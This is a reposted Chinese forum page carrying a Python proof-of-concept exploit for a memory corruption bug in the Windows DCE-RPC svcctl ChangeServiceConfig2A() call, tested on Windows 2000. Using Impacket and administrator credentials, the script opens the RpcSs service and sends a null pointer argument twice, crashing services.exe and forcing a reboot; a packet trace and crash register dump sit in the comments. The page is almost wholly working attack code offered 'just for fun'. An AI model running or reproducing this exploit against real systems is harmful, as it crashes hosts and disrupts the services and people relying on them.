• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

    发布者: 土豆服务器 | 发布时间: 2025-6-28 22:49| 查看数: 52| 评论数: 0|帖子模式

    #!/usr/bin/python
    # MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit
    # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
    # Tested on Windows 2000 SP4 Polish (all patches)
    #
    # Requires..
    # - Impacket : http://oss.coresecurity.com/projects/impacket.html
    # - PyCrypto : http://www.amk.ca/python/code/crypto.html
    #
    # Details:..
    #
    # [exploit] Session Setup AndX Request, User: Administrator -->        [target]
    # [exploit] Session Setup AndX Response <--                            [target]
    # [exploit] Tree Connect AndX Request -->                              [target]
    # [exploit] Tree Connect AndX Response <--                             [target]
    # [exploit] NT Create AndX Request, Path: \svcctl -->                  [target]
    # [exploit] NT Create AndX Response, Fid: 0x4000 <--                   [target]
    # [exploit] DCERPC Bind UUID: SVCCTL -->                               [target]
    # [exploit] DCERPC Bind_ack <--                                        [target]
    # [exploit] SVCCTL OpenSCManagerW request -->                          [target]
    # [exploit] SVCCTL OpenSCManagerW response(handle) <--                 [target]
    # [exploit] SVCCTL OpenServiceW request -->                            [target]
    # [exploit] SVCCTL OpenServiceW response(handle) <--                   [target]
    # [exploit] SVCCTL ChangeServiceConfig2A(handle, 1, 1, 0x00000000) --> [target]
    # [exploit] DCERPC Fault: status: unknwon(0xc00000fd) <--              [target]
    # [exploit] SVCCTL ChangeServiceConfig2A(handle, 1, 1, 0x00000000) --> [target]
    # [exploit] SMB Trans Response, Error: Unknown DoS Error <--           [target](crashed)
    #
    # [Module services]
    # Exception C0000005 (ACCESS_VIOLATION reading [00000000])
    # -------------------------------------------------------------
    # EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
    # EBX=004D83C0: 28 83 4D 00 48 84 4D 00-34 84 4D 00 48 61 08 00
    # ECX=00000890: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
    # EDX=00000001: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
    # ESP=015BF8C0: 34 F9 5B 01 00 00 00 00-00 FB 5B 01 00 00 00 00
    # EBP=015BF8F4: 30 F9 5B 01 AD 20 01 01-B8 FB 0D 00 01 00 00 00
    # ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
    # EDI=01017000: 90 9C 07 00 FF FF FF FF-00 00 00 00 00 00 00 00
    # EIP=010108A8: FF 30 68 90 A5 00 01 FF-75 FC E8 CF 1D 00 00 8B
    #               --> PUSH DWORD PTR [EAX]
    #
    # [Process services.exe terminated, system reboot]
    #
    # Just for fun ;]
    ##

    from impacket.structure import Structure
    from impacket.dcerpc import transport
    from impacket import uuid
    from random import randint
    from time import sleep

    host = '192.168.0.1'
    username = 'Administrator'
    password = 'Administrator_Password'

    interface = ('svcctl', '367abb81-9844-35f1-ad32-98f038001003', '2.0')

    stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
    stringbinding %= {
    'host': host,
    'pipe': interface[0],
    }

    # random dword
    def dword_rand():
       s_dword = 256 ** 4
       return randint(0, s_dword)

    # unicode string
    def utf16(str):
       return str.encode('utf_16_le')

    # MS RPC string
    def rpcstr(str, id = 1, unicode_string = 1):
       class foo(Structure):
           alignment = 4
           structure = ()

           if(id == 1):
               structure  = (('id', '<L')),

           structure  = (
               ('max', '<L'),
               ('offset', '<L=0'),
               ('actual', '<L'),
               ('str', '%s'),
           )

       query = foo()

       if(id == 1):
           query['id'] = dword_rand()

       query['max'] = len(str)
       query['actual'] = len(str)

       if(unicode_string == 1):
           query['str'] = utf16(str)
       else:
           query['str'] = str

       return query

    # MS RPC OpenSCManager
    def OpenSCManager(host, access = 1):
       class foo(Structure):
           opnum = 0x0f
           structure = (
               ('str1', ':'),
               ('null', '<L=0'),
               ('access', '<L'),
           )

       query = foo()
       query['str1'] = rpcstr("\\\\%s\x00" % (host))
       query['access'] = access

       return query

    # MS RPC OpenServiceW
    def OpenService(handle, service, access = 1):
       class foo(Structure):
           opnum = 0x10
           structure = (
               ('handle', ':'),
               ('str1', ':'),
               ('access', '<L'),
           )

       query = foo()

       query['handle'] = handle
       query['str1'] = rpcstr("%s\x00" % (service), 0)
       query['access'] = access

       return query

    trans = transport.DCERPCTransportFactory(stringbinding)
    trans.set_credentials(username, password)
    trans.connect()
    dce = trans.DCERPC_class(trans)
    dce.bind(uuid.uuidtup_to_bin((interface[1], interface[2])))

    query = OpenSCManager(host, access = 1)
    dce.call(query.opnum, query)
    raw = dce.recv()
    handle = raw[:20]

    query = OpenService(handle, "RpcSs", access = 0xF01FF)
    dce.call(query.opnum, query)
    raw = dce.recv()
    handle = raw[:20]

    ##
    # ChangeServiceConfig2A() [IDL code generated by mIDA v1.0.7]
    #
    # typedef struct struct_1 {
    #  long elem_1;
    #  [switch_is(elem_1)] union union_2 elem_2;
    #  } struct_1 ;
    #
    # typedef [switch_type( unsigned long )] union union_2 {
    # [case(1)]  struct struct_3 * elem_1;
    # [case(2)]  struct struct_4 * elem_2;
    # } union_2;
    #
    # typedef struct struct_3 {
    # [string] char * elem_1;
    # } struct_3 ;
    #
    #
    # /* opcode: 0x24, address: 0x0101203B */
    #
    # long  sub_101203B (
    # [in][context_handle] void * arg_1,
    # [in] struct struct_1 arg_2
    # );
    ##

    class ChangeServiceConfig2A(Structure):
       opnum = 0x24
       structure = (
           ('context_handle', ':'),
           ('switch_is', '<L=1'),
           ('case', '<L=1'),
           ('struct_3', '<L=0x00000000'), # <-- vulnerable argument
         )

    query = ChangeServiceConfig2A()
    query['context_handle'] = handle

    for i in range(0, 2):
       dce.call(query.opnum, query)
       sleep(1)

    dce.disconnect()

    # EoF

    //http://www.heibai.com

    来源:https://www.jb51.net/hack/5705.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表